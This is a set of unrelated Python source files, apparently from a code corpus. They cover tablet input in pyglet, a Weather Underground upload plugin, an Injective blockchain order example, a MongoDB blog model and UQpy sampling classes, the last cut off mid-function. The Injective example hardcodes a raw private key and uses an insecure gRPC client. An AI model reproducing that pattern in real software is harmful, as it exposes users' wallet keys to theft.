self._current_cursor = None
self._pressure_scale = device.pressure_axis.get_scale()
self._pressure_bias = device.pressure_axis.get_bias()
def close(self):
lib.WTClose(self._context)
self._context = None
def _set_current_cursor(self, cursor_type):
if self._current_cursor:
self.dispatch_event('on_cursor_leave', self._current_cursor)
self._current_cursor = self.device._cursor_map.get(cursor_type, None)
if self._current_cursor:
self.dispatch_event('on_cursor_enter', self._current_cursor)
@pyglet.window.win32.Win32EventHandler(0)
def _event_wt_packet(self, msg, wParam, lParam):
if lParam != self._context:
return
packet = PACKET()
if lib.WTPacket(self._context, wParam, ctypes.byref(packet)) == 0:
return
if not packet.pkChanged:
return
window_x, window_y = self.window.get_location() # TODO cache on window
window_y = self.window.screen.height - window_y - self.window.height
x = packet.pkX - window_x
y = packet.pkY - window_y
pressure = (packet.pkNormalPressure + self._pressure_bias) * \
self._pressure_scale
if self._current_cursor is None:
self._set_current_cursor(packet.pkCursor)
self.dispatch_event('on_motion', self._current_cursor,
x, y, pressure)
@pyglet.window.win32.Win32EventHandler(0)
def _event_wt_proximity(self, msg, wParam, lParam):
if wParam != self._context:
return
if not lParam & 0xffff0000:
# Not a hardware proximity event
return
if not lParam & 0xffff:
# Going out
self.dispatch_event('on_cursor_leave', self._current_cursor)
# If going in, proximity event will be generated by next event, which
# can actually grab a cursor id.
self._current_cursor = None
DeviceInstance.register_event_type('on_cursor_enter')
DeviceInstance.register_event_type('on_cursor_leave')
DeviceInstance.register_event_type('on_motion')
class WintabCursor:
def __init__(self, device, index):
self.device = device
self._cursor = WTI_CURSORS + index
self.name = wtinfo_string(self._cursor, CSR_NAME).strip()
self.active = wtinfo_bool(self._cursor, CSR_ACTIVE)
pktdata = wtinfo_wtpkt(self._cursor, CSR_PKTDATA)
# A whole bunch of cursors are reported by the driver, but most of
# them are hogwash. Make sure a cursor has at least X and Y data
# before adding it to the device.
self.bogus = not (pktdata & PK_X and pktdata & PK_Y)
if self.bogus:
return
self.id = (wtinfo_dword(self._cursor, CSR_TYPE) << 32) | \
wtinfo_dword(self._cursor, CSR_PHYSID)
def __repr__(self):
return 'WintabCursor(%r)' % self.name
def check_version():
interface_name = wtinfo_string(WTI_INTERFACE, IFC_WINTABID)
spec_version = wtinfo_word(WTI_INTERFACE, IFC_SPECVERSION)
impl_version = wtinfo_word(WTI_INTERFACE, IFC_IMPLVERSION)
print('%s %d.%d (Spec %d.%d)' % (interface_name,
impl_version >> 8, impl_version & 0xff,
spec_version >> 8, spec_version & 0xff))
if spec_version < 0x101:
raise ImportError('Require WinTab specification 1.1 or later')
def get_devices():
n_devices = wtinfo_uint(WTI_INTERFACE, IFC_NDEVICES)
devices = [Device(i) for i in range(n_devices)]
return devices
|
py | 1a3453cf2c44fb3eb6286a073c15fb0ccd270149 | import urllib2
import logging
import stormberry.plugin
from urllib import urlencode
class WundergroundUploader(stormberry.plugin.IRepositoryPlugin):
def store_reading(self, data):
"""Internal. Continuously uploads new sensors values to Weather Underground."""
print('Uploading data to Weather Underground')
# Build a weather data object http://wiki.wunderground.com/index.php/PWS_-_Upload_Protocol
weather_data = {
'action': 'updateraw',
'ID': self.config['WUNDERGROUND']['STATION_ID'],
'PASSWORD': self.config['WUNDERGROUND']['STATION_KEY'],
'dateutc': 'now',
'tempf': data.tempf,
'humidity': data.humidity,
'baromin': data.pressure_inHg,
'dewptf': data.dewpointf
}
try:
upload_url = self.config['WUNDERGROUND']['WU_URL'] + '?' + urlencode(weather_data)
response = urllib2.urlopen(upload_url)
html = response.read()
print('Server response: ', html)
# Close response object
response.close()
return True
except:
print('Could not upload to Weather Underground')
logging.warning('Could not upload to Weather Underground', exc_info=True)
return False
|
py | 1a34548459d377a46a8088c85728d2ac3cb66085 | # Copyright 2021 Injective Labs
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Injective Chain Tx/Query client for Python. Example only."""
import asyncio
import logging
from pyinjective.composer import Composer as ProtoMsgComposer
from pyinjective.client import Client
from pyinjective.transaction import Transaction
from pyinjective.constant import Network
from pyinjective.wallet import PrivateKey, PublicKey, Address
async def main() -> None:
# select network: local, testnet, mainnet
network = Network.testnet()
composer = ProtoMsgComposer(network=network.string())
# initialize grpc client
client = Client(network, insecure=True)
# load account
priv_key = PrivateKey.from_hex("5d386fbdbf11f1141010f81a46b40f94887367562bd33b452bbaa6ce1cd1381e")
pub_key = priv_key.to_public_key()
address = pub_key.to_address().init_num_seq(network.lcd_endpoint)
subaccount_id = address.get_subaccount_id(index=0)
# prepare trade info
market_id = "0xd0f46edfba58827fe692aab7c8d46395d1696239fdf6aeddfa668b73ca82ea30"
fee_recipient = "inj1hkhdaj2a2clmq5jq6mspsggqs32vynpk228q3r"
# prepare tx msg
msg = composer.MsgCreateDerivativeMarketOrder(
sender=address.to_acc_bech32(),
market_id=market_id,
subaccount_id=subaccount_id,
fee_recipient=fee_recipient,
price=60000,
quantity=0.01,
leverage=3,
is_buy=True
)
# build sim tx
tx = (
Transaction()
.with_messages(msg)
.with_sequence(address.get_sequence())
.with_account_num(address.get_number())
.with_chain_id(network.chain_id)
)
sim_sign_doc = tx.get_sign_doc(pub_key)
sim_sig = priv_key.sign(sim_sign_doc.SerializeToString())
sim_tx_raw_bytes = tx.get_tx_data(sim_sig, pub_key)
# simulate tx
(simRes, success) = client.simulate_tx(sim_tx_raw_bytes)
if not success:
print(simRes)
return
sim_res_msg = ProtoMsgComposer.MsgResponses(simRes.result.data, simulation=True)
print("simulation msg response")
print(sim_res_msg)
# build tx
gas_price = 500000000
gas_limit = simRes.gas_info.gas_used + 15000 # add 15k for gas, fee computation
fee = [composer.Coin(
amount=gas_price * gas_limit,
denom=network.fee_denom,
)]
current_height = client.get_latest_block().block.header.height
tx = tx.with_gas(gas_limit).with_fee(fee).with_memo("").with_timeout_height(current_height+50)
sign_doc = tx.get_sign_doc(pub_key)
sig = priv_key.sign(sign_doc.SerializeToString())
tx_raw_bytes = tx.get_tx_data(sig, pub_key)
# broadcast tx: send_tx_async_mode, send_tx_sync_mode, send_tx_block_mode
res = client.send_tx_block_mode(tx_raw_bytes)
res_msg = ProtoMsgComposer.MsgResponses(res.data)
print("tx response")
print(res)
print("tx msg response")
print(res_msg)
if __name__ == "__main__":
logging.basicConfig(level=logging.INFO)
asyncio.get_event_loop().run_until_complete(main())
|
py | 1a34552198cdec8eb87a211e446607e4ef508e02 | # -*- coding: utf-8 -*-
"""
blog
~~~~~~~~~~~~~~
blog definition.
:copyright: (c) 2016 by fengweimin.
:date: 16/8/16
"""
from datetime import datetime
from bson.objectid import ObjectId
from werkzeug.utils import cached_property
from app.extensions import mdb
from app.models import User
from app.mongosupport import Model
@mdb.register
class Tag(Model):
__collection__ = 'tags'
structure = {
'name': unicode,
'weight': int,
'createTime': datetime,
}
required_fields = ['name', 'weight', 'createTime']
default_values = {'weight': 0, 'createTime': datetime.now}
indexes = [{'fields': ['name'], 'unique': True}]
@mdb.register
class Post(Model):
__collection__ = 'posts'
structure = {
'uid': ObjectId,
'pics': [unicode],
'title': unicode,
'body': unicode,
'tids': [ObjectId], # 相关标签
'createTime': datetime,
'viewTimes': int,
'comments': [{
'id': int,
'uid': ObjectId, # 发表评论人
'content': unicode,
'time': datetime,
'replys': [{
'uid': ObjectId, # 发表回复的人
'rid': ObjectId, # 接收回复的人
'content': unicode,
'time': datetime
}]
}]
}
required_fields = ['uid', 'title', 'body', 'tids', 'createTime']
default_values = {'createTime': datetime.now, 'viewTimes': 0}
indexes = [{'fields': 'tids'}, {'fields': 'createTime'}]
@cached_property
def author(self):
author = User.find_one({'_id': self.uid})
return author
@cached_property
def tags(self):
ids = list(self.tids)
tag_dict = {t._id: t for t in Tag.find({'_id': {'$in': ids}})}
return [tag_dict[id] for id in ids if id in tag_dict]
|
py | 1a3455e2c8f1c28a1b5a8b75f7074c1334a2652b | """This module contains functionality for all the sampling methods supported in UQpy."""
import sys
import copy
import numpy as np
from scipy.spatial.distance import pdist
import scipy.stats as sp
import random
from UQpy.Distributions import *
import warnings
def init_sm(data):
################################################################################################################
# Add available sampling methods Here
valid_methods = ['mcs', 'lhs', 'mcmc', 'pss', 'sts', 'SuS']
################################################################################################################
# Check if requested method is available
if 'method' in data:
if data['method'] not in valid_methods:
raise NotImplementedError("method - %s not available" % data['method'])
else:
raise NotImplementedError("No sampling method was provided")
################################################################################################################
# Monte Carlo simulation block.
# Mandatory properties(4): 1. Number of parameters, 2. distribution, 3. distribution parameters 4. Number of samples
# Optional properties(0):
if data['method'] == 'mcs':
# Mandatory
if 'number of samples' not in data:
data['number of samples'] = None
if 'distribution type' not in data:
raise NotImplementedError("Distributions not defined. Exit code")
if 'distribution parameters' not in data:
raise NotImplementedError("Distribution parameters not provided. Exit code")
if 'number of parameters' not in data:
data['number of parameters'] = None
################################################################################################################
# Latin Hypercube simulation block.
# Mandatory properties(4): 1. Number of parameters, 2. distribution, 3. distribution parameters 4. Number of samples
# Optional properties(3): 1. Criterion, 2. Metric, 3. Iterations
if data['method'] == 'lhs':
# Mandatory
if 'number of parameters' not in data:
data['number of parameters'] = None
if 'number of samples' not in data:
data['number of samples'] = None
if 'distribution type' not in data:
raise NotImplementedError("Exit code: Distributions not defined.")
if 'distribution parameters' not in data:
raise NotImplementedError("Exit code: Distribution parameters not defined.")
# Optional
if 'criterion' not in data:
data['criterion'] = None
if 'distance' not in data:
data['distance'] = None
if 'iterations' not in data:
data['iterations'] = None
####################################################################################################################
# Markov Chain Monte Carlo simulation block.
# Mandatory properties(4): 1. target distribution, 2. target distribution parameters, 3. Number of samples,
# 4. Number of parameters
# Optional properties(5): 1. Proposal distribution, 2. proposal width, 3. Seed, 4. skip samples (avoid burn-in),
# 5. algorithm
if data['method'] == 'mcmc':
# Mandatory
if 'number of parameters' not in data:
raise NotImplementedError('Exit code: Number of parameters not defined.')
if 'target distribution type' not in data:
raise NotImplementedError("Exit code: Target distribution type not defined.")
if 'target distribution parameters' not in data:
raise NotImplementedError("Exit code: Target distribution parameters not defined.")
if 'number of samples' not in data:
raise NotImplementedError('Exit code: Number of samples not defined.')
# Optional
if 'seed' not in data:
data['seed'] = None
if 'skip' not in data:
data['skip'] = None
if 'proposal distribution type' not in data:
data['proposal distribution type'] = None
#else:
# if data['proposal distribution type'] not in ['Uniform', 'Normal']:
# raise ValueError('Exit code: Unrecognized type of proposal distribution type. Supported distributions: '
# 'Uniform, '
# 'Normal.')
if 'proposal distribution width' not in data:
data['proposal distribution width'] = None
if 'algorithm' not in data:
data['algorithm'] = None
################################################################################################################
# Partially stratified sampling block.
# Mandatory properties (4): 1. distribution, 2. distribution parameters, 3. design, 4. strata
# Optional properties(1): 1. Number of parameters
if data['method'] == 'pss':
# Mandatory
if 'distribution type' not in data:
raise NotImplementedError("Exit code: Distributions not defined.")
elif 'distribution parameters' not in data:
raise NotImplementedError("Exit code: distribution parameters not defined.")
if 'design' not in data:
raise NotImplementedError("Exit code: pss design not defined.")
if 'strata' not in data:
raise NotImplementedError("Exit code: pss strata not defined.")
# Optional
if 'number of parameters' not in data:
data['number of parameters'] = None
################################################################################################################
# Stratified sampling block.
# Mandatory properties(3): 1. distribution, 2. distribution parameters, 3. design
# Optional properties(1): 1. Number of parameters
if data['method'] == 'sts':
# Mandatory
if 'distribution type' not in data:
raise NotImplementedError("Exit code: Distributions not defined.")
elif 'distribution parameters' not in data:
raise NotImplementedError("Exit code: distribution parameters not defined.")
if 'design' not in data:
raise NotImplementedError("Exit code: sts design not defined.")
# Optional
if 'number of parameters' not in data:
data['number of parameters'] = None
####################################################################################################################
# Stochastic reduced order model block
# Mandatory properties(2): 1. moments, 2. error function weights
# Optional properties(2): 1.properties to match, 2. sample weights
# if 'SROM' in data and data['SROM'] is True:
# # Mandatory
# if 'moments' not in data:
# raise NotImplementedError("Exit code: Moments not provided.")
# if 'error function weights' not in data:
# raise NotImplementedError("Exit code: Error function weights not provided.")
#
# # Optional
# if 'properties to match' not in data:
# data['properties to match'] = None
# if 'correlation' not in data:
# data['correlation'] = None
# if 'weights for distribution' not in data:
# data['weights for distribution'] = None
# if 'weights for moments' not in data:
# data['weights for moments'] = None
# if 'weights for correlation' not in data:
# data['weights for correlation'] = None
####################################################################################################################
# Check any NEW METHOD HERE
#
#
####################################################################################################################
# Check any NEW METHOD HERE
#
#
########################################################################################################################
########################################################################################################################
########################################################################################################################
def run_sm(data):
################################################################################################################
# Run Monte Carlo simulation
if data['method'] == 'mcs':
print("\nRunning %k \n", data['method'])
rvs = MCS(dimension=data['number of parameters'], pdf_type=data['distribution type'],
pdf_params=data['distribution parameters'],
nsamples=data['number of samples'])
################################################################################################################
# Run Latin Hypercube sampling
elif data['method'] == 'lhs':
print("\nRunning %k \n", data['method'])
rvs = LHS(dimension=data['number of parameters'], pdf_type=data['distribution type'],
pdf_params=data['distribution parameters'],
nsamples=data['number of samples'], lhs_metric=data['distance'],
lhs_iter=data['iterations'], lhs_criterion=data['criterion'])
################################################################################################################
# Run partially stratified sampling
elif data['method'] == 'pss':
print("\nRunning %k \n", data['method'])
rvs = PSS(dimension=data['number of parameters'], pdf_type=data['distribution type'],
pdf_params=data['distribution parameters'],
pss_design=data['design'], pss_strata=data['strata'])
################################################################################################################
# Run STS sampling
elif data['method'] == 'sts':
print("\nRunning %k \n", data['method'])
rvs = STS(dimension=data['number of parameters'], pdf_type=data['distribution type'],
pdf_params=data['distribution parameters'], sts_design=data['design'])
################################################################################################################
# Run Markov Chain Monte Carlo sampling
elif data['method'] == 'mcmc':
print("\nRunning %k \n", data['method'])
rvs = MCMC(dimension=data['number of parameters'], pdf_target_type=data['target distribution type'],
algorithm=data['algorithm'], pdf_proposal_type=data['proposal distribution type'],
pdf_proposal_width=data['proposal distribution width'],
pdf_target_params=data['target distribution parameters'], seed=data['seed'],
skip=data['skip'], nsamples=data['number of samples'])
################################################################################################################
# Run Stochastic Reduce Order Model
# if 'SROM' in data:
# if data['SROM'] == 'Yes':
# print("\nImplementing SROM to samples")
# rvs = SROM(samples=rvs.samples, pdf_type=data['distribution type'], moments=data['moments'],
# weights_errors=data['error function weights'],
# weights_distribution=data['weights for distribution'],
# weights_moments=data['weights for moments'],
# weights_correlation=data['weights for correlation'], properties=data['properties to match'],
# pdf_params=data['distribution parameters'], correlation=data['correlation'])
################################################################################################################
# Run ANY NEW METHOD HERE
return rvs
########################################################################################################################
########################################################################################################################
# Monte Carlo simulation
########################################################################################################################
class MCS:
"""
A class used to perform brute force Monte Carlo design of experiment (MCS).
SamplesU01 belong in hypercube [0, 1]^n while samples belong to the parameter space
:param dimension: Number of parameters
:type dimension: int
:param nsamples: Number of samples to be generated
:type nsamples: int
:param pdf_type: Type of distributions
:type pdf_type: list
:param pdf_params: Distribution parameters
:type pdf_params: list
"""
def __init__(self, dimension=None, pdf_type=None, pdf_params=None, nsamples=None):
self.dimension = dimension
self.nsamples = nsamples
self.pdf_type = pdf_type
self.pdf_params = pdf_params
self.init_mcs()
self.samplesU01, self.samples = self.run_mcs()
def run_mcs(self):
samples = np.random.rand(self.nsamples, self.dimension)
samples_u_to_x = inv_cdf(samples, self.pdf_type, self.pdf_params)
return samples, samples_u_to_x
################################################################################################################
# Initialize Monte Carlo simulation.
# Necessary parameters: 1. Probability distribution, 2. Probability distribution parameters 3. Number of samples
# Optional: dimension, names of random variables
def init_mcs(self):
if self.nsamples is None:
raise NotImplementedError("Exit code: Number of samples not defined.")
if self.pdf_type is None:
raise NotImplementedError("Exit code: Distributions not defined.")
else:
for i in self.pdf_type:
if i not in ['Uniform', 'Normal', 'Lognormal', 'Weibull', 'Beta', 'Exponential', 'Gamma']:
raise NotImplementedError("Exit code: Unrecognized type of distribution."
"Supported distributions: 'Uniform', 'Normal', 'Lognormal', "
"'Weibull', 'Beta', 'Exponential', 'Gamma'. ")
if self.pdf_params is None:
raise NotImplementedError("Exit code: Distribution parameters not defined.")
if self.dimension is None:
if len(self.pdf_type) != len(self.pdf_params):
raise NotImplementedError("Exit code: Incompatible dimensions.")
else:
self.dimension = len(self.pdf_type)
else:
import itertools
from itertools import chain
if len(self.pdf_type) == 1 and len(self.pdf_params) == self.dimension:
self.pdf_type = list(itertools.repeat(self.pdf_type, self.dimension))
self.pdf_type = list(chain.from_iterable(self.pdf_type))
elif len(self.pdf_params) == 1 and len(self.pdf_type) == self.dimension:
self.pdf_params = list(itertools.repeat(self.pdf_params, self.dimension))
self.pdf_params = list(chain.from_iterable(self.pdf_params))
elif len(self.pdf_params) == 1 and len(self.pdf_type) == 1:
self.pdf_params = list(itertools.repeat(self.pdf_params, self.dimension))
self.pdf_type = list(itertools.repeat(self.pdf_type, self.dimension))
self.pdf_type = list(chain.from_iterable(self.pdf_type))
self.pdf_params = list(chain.from_iterable(self.pdf_params))
elif len(self.pdf_type) != len(self.pdf_params):
raise NotImplementedError("Exit code: Incompatible dimensions")
########################################################################################################################
########################################################################################################################
# Latin hypercube sampling (LHS)
########################################################################################################################
class LHS:
"""
A class that creates a Latin Hypercube Design for experiments.
SamplesU01 belong in hypercube [0, 1]^n while samples belong to the parameter space
:param pdf_type: Distribution of the parameters
:type pdf_type: list
:param pdf_params: Distribution parameters
:type pdf_params: list
:param lhs_criterion: The criterion for generating sample points
Options:
1. random - completely random \n
2. centered - points only at the centre \n
3. maximin - maximising the minimum distance between points \n
4. correlate - minimizing the correlation between the points \n
:type lhs_criterion: str
:param lhs_iter: The number of iteration to run. Only for maximin, correlate and criterion
:type lhs_iter: int
:param lhs_metric: The distance metric to use. Supported metrics are
'braycurtis', 'canberra', 'chebyshev', 'cityblock', 'correlation', 'cosine', 'dice', \n
'euclidean', 'hamming', 'jaccard', 'kulsinski', 'mahalanobis', 'matching', 'minkowski', \n
'rogerstanimoto', 'russellrao', 'seuclidean', 'sokalmichener', 'sokalsneath', 'sqeuclidean', \n
'yule'.
:type lhs_metric: str
"""
def __init__(self, dimension=None, pdf_type=None, pdf_params=None, lhs_criterion=None, lhs_metric=None,
lhs_iter=None, nsamples=None):
self.dimension = dimension
self.nsamples = nsamples
self.pdf_type = pdf_type
self.pdf_params = pdf_params
self.lhs_criterion = lhs_criterion
self.lhs_metric = lhs_metric
self.lhs_iter = lhs_iter
self.init_lhs()
self.samplesU01, self.samples = self.run_lhs()
def run_lhs(self):
print('Running LHS for ' + str(self.lhs_iter) + ' iterations')
cut = np.linspace(0, 1, self.nsamples + 1)
a = cut[:self.nsamples]
b = cut[1:self.nsamples + 1]
if self.lhs_criterion == 'random':
samples = self._random(a, b)
samples_u_to_x = inv_cdf(samples, self.pdf_type, self.pdf_params)
return samples, samples_u_to_x
elif self.lhs_criterion == 'centered':
samples = self._centered(a, b)
samples_u_to_x = inv_cdf(samples, self.pdf_type, self.pdf_params)
return samples, samples_u_to_x
elif self.lhs_criterion == 'maximin':
samples = self._max_min(a, b)
samples_u_to_x = inv_cdf(samples, self.pdf_type, self.pdf_params)
return samples, samples_u_to_x
elif self.lhs_criterion == 'correlate':
samples = self._correlate(a, b)
samples_u_to_x = inv_cdf(samples, self.pdf_type, self.pdf_params)
return samples, samples_u_to_x
def _random(self, a, b):
"""
:return: The samples points for the random LHS design
"""
u = np.random.rand(self.nsamples, self.dimension)
samples = np.zeros_like(u)
for i in range(self.dimension):
samples[:, i] = u[:, i] * (b - a) + a
for j in range(self.dimension):
order = np.random.permutation(self.nsamples)
samples[:, j] = samples[order, j]
return samples
def _centered(self, a, b):
samples = np.zeros([self.nsamples, self.dimension])
centers = (a + b) / 2
for i in range(self.dimension):
samples[:, i] = np.random.permutation(centers)
return samples
def _max_min(self, a, b):
max_min_dist = 0
samples = self._random(a, b)
for _ in range(self.lhs_iter):
samples_try = self._random(a, b)
d = pdist(samples_try, metric=self.lhs_metric)
if max_min_dist < np.min(d):
max_min_dist = np.min(d)
samples = copy.deepcopy(samples_try)
print('Achieved max_min distance of ', max_min_dist)
return samples
def _correlate(self, a, b):
min_corr = np.inf
samples = self._random(a, b)
for _ in range(self.lhs_iter):
samples_try = self._random(a, b)
R = np.corrcoef(np.transpose(samples_try))
np.fill_diagonal(R, 1)
R1 = R[R != 1]
if np.max(np.abs(R1)) < min_corr:
min_corr = np.max(np.abs(R1))
samples = copy.deepcopy(samples_try)
print('Achieved minimum correlation of ', min_corr)
return samples
################################################################################################################
# Latin hypercube checks.
# Necessary parameters: 1. Probability distribution, 2. Probability distribution parameters
# Optional: number of samples (default 100), criterion, metric, iterations
def init_lhs(self):
if self.nsamples is None:
raise NotImplementedError("Exit code: Number of samples not defined.")
if self.pdf_type is None:
raise NotImplementedError("Exit code: Distributions not defined.")
else:
for i in self.pdf_type:
if i not in ['Uniform', 'Normal', 'Lognormal', 'Weibull', 'Beta', 'Exponential', 'Gamma']:
raise NotImplementedError("Exit code: Unrecognized type of distribution."
"Supported distributions: 'Uniform', 'Normal', 'Lognormal', 'Weibull', "
"'Beta', 'Exponential', 'Gamma'.")
if self.pdf_params is None:
raise NotImplementedError("Exit code: Distribution parameters not defined.")
if self.dimension is None:
if len(self.pdf_type) != len(self.pdf_params):
raise NotImplementedError("Exit code: Incompatible dimensions.")
else:
self.dimension = len(self.pdf_type)
else:
import itertools
from itertools import chain
if len(self.pdf_type) == 1 and len(self.pdf_params) == self.dimension:
self.pdf_type = list(itertools.repeat(self.pdf_type, self.dimension))
self.pdf_type = list(chain.from_iterable(self.pdf_type))
elif len(self.pdf_params) == 1 and len(self.pdf_type) == self.dimension:
self.pdf_params = list(itertools.repeat(self.pdf_params, self.dimension))
self.pdf_params = list(chain.from_iterable(self.pdf_params))
elif len(self.pdf_params) == 1 and len(self.pdf_type) == 1:
self.pdf_params = list(itertools.repeat(self.pdf_params, self.dimension))
self.pdf_type = list(itertools.repeat(self.pdf_type, self.dimension))
self.pdf_type = list(chain.from_iterable(self.pdf_type))
self.pdf_params = list(chain.from_iterable(self.pdf_params))
elif len(self.pdf_type) != len(self.pdf_params):
raise NotImplementedError("Exit code: Incompatible dimensions.")
if self.lhs_criterion is None:
self.lhs_criterion = 'random'
else:
if self.lhs_criterion not in ['random', 'centered', 'maximin', 'correlate']:
raise NotImplementedError("Exit code: Supported lhs criteria: 'random', 'centered', 'maximin', "
"'correlate'")
if self.lhs_metric is None:
self.lhs_metric = 'euclidean'
else:
if self.lhs_metric not in ['braycurtis', 'canberra', 'chebyshev', 'cityblock', 'correlation', 'cosine',
'dice', 'euclidean', 'hamming', 'jaccard', 'kulsinski', 'mahalanobis',
'matching', 'minkowski', 'rogerstanimoto', 'russellrao', 'seuclidean',
'sokalmichener', 'sokalsneath', 'sqeuclidean']:
raise NotImplementedError("Exit code: Supported lhs distances: 'braycurtis', 'canberra', 'chebyshev', "
"'cityblock',"
" 'correlation', 'cosine','dice', 'euclidean', 'hamming', 'jaccard', "
"'kulsinski', 'mahalanobis', 'matching', 'minkowski', 'rogerstanimoto',"
"'russellrao', 'seuclidean','sokalmichener', 'sokalsneath', 'sqeuclidean'")
if self.lhs_iter is None or self.lhs_iter == 0:
self.lhs_iter = 1000
elif self.lhs_iter is not None:
self.lhs_iter = int(self.lhs_iter)
########################################################################################################################
########################################################################################################################
# Partially Stratified Sampling (PSS)
########################################################################################################################
class PSS:
"""
This class generates a partially stratified sample set on U(0,1) as described in:
Shields, M.D. and Zhang, J. "The generalization of Latin hypercube sampling" Reliability Engineering and
System Safety. 148: 96-108
:param pss_design: Vector defining the subdomains to be used.
Example: 5D problem with 2x2D + 1x1D subdomains using pss_design = [2,2,1]. \n
Note: The sum of the values in the pss_design vector equals the dimension of the problem.
:param pss_strata: Vector defining how each dimension should be stratified.
Example: 5D problem with 2x2D + 1x1D subdomains with 625 samples using
pss_pss_stratum = [25,25,625].\n
Note: pss_pss_stratum(i)^pss_design(i) = number of samples (for all i)
:return: pss_samples: Generated samples Array (nSamples x nRVs)
:type pss_design: list
:type pss_strata: list
Created by: Jiaxin Zhang
Last modified: 24/01/2018 by D.G. Giovanis
"""
# TODO: Jiaxin - Add documentation to this subclass
# TODO: the pss_design = [[1,4], [2,5], [3]] - then reorder the sequence of RVs
# TODO: Add the sample check and pss_design check in the beginning
# TODO: Create a list that contains all element info - parent structure
def __init__(self, dimension=None, pdf_type=None, pdf_params=None, pss_design=None, pss_strata=None):
self.pdf_type = pdf_type
self.pdf_params = pdf_params
self.pss_design = pss_design
self.pss_strata = pss_strata
self.dimension = dimension
self.init_pss()
self.nsamples = self.pss_strata[0] ** self.pss_design[0]
self.samplesU01, self.samples = self.run_pss()
def run_pss(self):
samples = np.zeros((self.nsamples, self.dimension))
samples_u_to_x = np.zeros((self.nsamples, self.dimension))
col = 0
for i in range(len(self.pss_design)):
n_stratum = self.pss_strata[i] * np.ones(self.pss_design[i], dtype=np.int)
sts = STS(pdf_type=self.pdf_type, pdf_params=self.pdf_params, sts_design=n_stratum, pss_=True)
index = list(range(col, col + self.pss_design[i]))
samples[:, index] = sts.samplesU01
samples_u_to_x[:, index] = sts.samples
arr = np.arange(self.nsamples).reshape((self.nsamples, 1))
samples[:, index] = samples[np.random.permutation(arr), index]
samples_u_to_x[:, index] = samples_u_to_x[np.random.permutation(arr), index]
col = col + self.pss_design[i]
return samples, samples_u_to_x
################################################################################################################
# Partially Stratified sampling (PSS) checks.
# Necessary parameters: 1. pdf, 2. pdf parameters 3. pss design 4. pss strata
# Optional:
def init_pss(self):
if self.pdf_type is None:
raise NotImplementedError("Exit code: Distribution not defined.")
else:
for i in self.pdf_type:
if i not in ['Uniform', 'Normal', 'Lognormal', 'Weibull', 'Beta', 'Exponential', 'Gamma']:
raise NotImplementedError("Exit code: Unrecognized type of distribution."
"Supported distributions: 'Uniform', 'Normal', 'Lognormal', 'Weibull', "
"'Beta', 'Exponential', 'Gamma'. ")
if self.pdf_params is None:
raise NotImplementedError("Exit code: Distribution parameters not defined.")
if self.pss_design is None:
raise NotImplementedError("Exit code: pss design not defined.")
elif self.pss_strata is None:
raise NotImplementedError("Exit code: pss strata not defined.")
else:
if len(self.pss_design) != len(self.pss_strata):
raise ValueError('Exit code: "pss design" and "pss strata" must be the same length.')
sample_check = np.zeros((len(self.pss_strata), len(self.pss_design)))
for i in range(len(self.pss_strata)):
for j in range(len(self.pss_design)):
sample_check[i, j] = self.pss_strata[i] ** self.pss_design[j]
if np.max(sample_check) != np.min(sample_check):
raise ValueError('Exit code: All dimensions must have the same number of samples/strata.')
if self.dimension is None:
self.dimension = np.sum(self.pss_design)
else:
if self.dimension != np.sum(self.pss_design):
raise NotImplementedError("Exit code: Incompatible dimensions.")
import itertools
from itertools import chain
if len(self.pdf_type) == 1 and len(self.pdf_params) == self.dimension:
self.pdf_type = list(itertools.repeat(self.pdf_type, self.dimension))
self.pdf_type = list(chain.from_iterable(self.pdf_type))
elif len(self.pdf_params) == 1 and len(self.pdf_type) == self.dimension:
self.pdf_params = list(itertools.repeat(self.pdf_params, self.dimension))
self.pdf_params = list(chain.from_iterable(self.pdf_params))
elif len(self.pdf_params) == 1 and len(self.pdf_type) == 1:
self.pdf_params = list(itertools.repeat(self.pdf_params, self.dimension))
self.pdf_type = list(itertools.repeat(self.pdf_type, self.dimension))
self.pdf_type = list(chain.from_iterable(self.pdf_type))
self.pdf_params = list(chain.from_iterable(self.pdf_params))
elif len(self.pdf_type) != len(self.pdf_params):
raise NotImplementedError("Exit code: Incompatible dimensions.")
########################################################################################################################
########################################################################################################################
# Stratified Sampling (sts)
########################################################################################################################
class STS:
# TODO: MDS - Add documentation to this subclass
"""
:param dimension:
:param pdf_type:
:param pdf_params:
:param sts_design:
:param pss_:
"""
def __init__(self, dimension=None, pdf_type=None, pdf_params=None, sts_design=None, pss_=None):
self.dimension = dimension
self.pdf_type = pdf_type
self.pdf_params = pdf_params
self.sts_design = sts_design
if pss_ is None:
self.init_sts()
strata = Strata(nstrata=self.sts_design)
self.origins = strata.origins
self.widths = strata.widths
self.weights = strata.weights
self.samplesU01, self.samples = self.run_sts()
def run_sts(self):
samples = np.empty([self.origins.shape[0], self.origins.shape[1]], dtype=np.float32)
for i in range(0, self.origins.shape[0]):
for j in range(0, self.origins.shape[1]):
samples[i, j] = np.random.uniform(self.origins[i, j], self.origins[i, j] + self.widths[i, j])
samples_u_to_x = inv_cdf(samples, self.pdf_type, self.pdf_params)
return samples, samples_u_to_x
def init_sts(self):
if self.pdf_type is None:
raise NotImplementedError("Exit code: Distribution not defined.")
else:
for i in self.pdf_type:
if i not in ['Uniform', 'Normal', 'Lognormal', 'Weibull', 'Beta', 'Exponential', 'Gamma']:
raise NotImplementedError("Exit code: Unrecognized type of distribution."
"Supported distributions: 'Uniform', 'Normal', 'Lognormal', 'Weibull', "
"'Beta', 'Exponential', 'Gamma'. ")
if self.pdf_params is None:
raise NotImplementedError("Exit code: Distribution parameters not defined.")
if self.sts_design is None:
raise NotImplementedError("Exit code: sts design not defined.")
if self.dimension is None:
self.dimension = len(self.sts_design)
else:
if self.dimension != len(self.sts_design):
raise NotImplementedError("Exit code: Incompatible dimensions.")
import itertools
from itertools import chain
if len(self.pdf_type) == 1 and len(self.pdf_params) == self.dimension:
self.pdf_type = list(itertools.repeat(self.pdf_type, self.dimension))
self.pdf_type = list(chain.from_iterable(self.pdf_type))
elif len(self.pdf_params) == 1 and len(self.pdf_type) == self.dimension:
self.pdf_params = list(itertools.repeat(self.pdf_params, self.dimension))
self.pdf_params = list(chain.from_iterable(self.pdf_params))
elif len(self.pdf_params) == 1 and len(self.pdf_type) == 1:
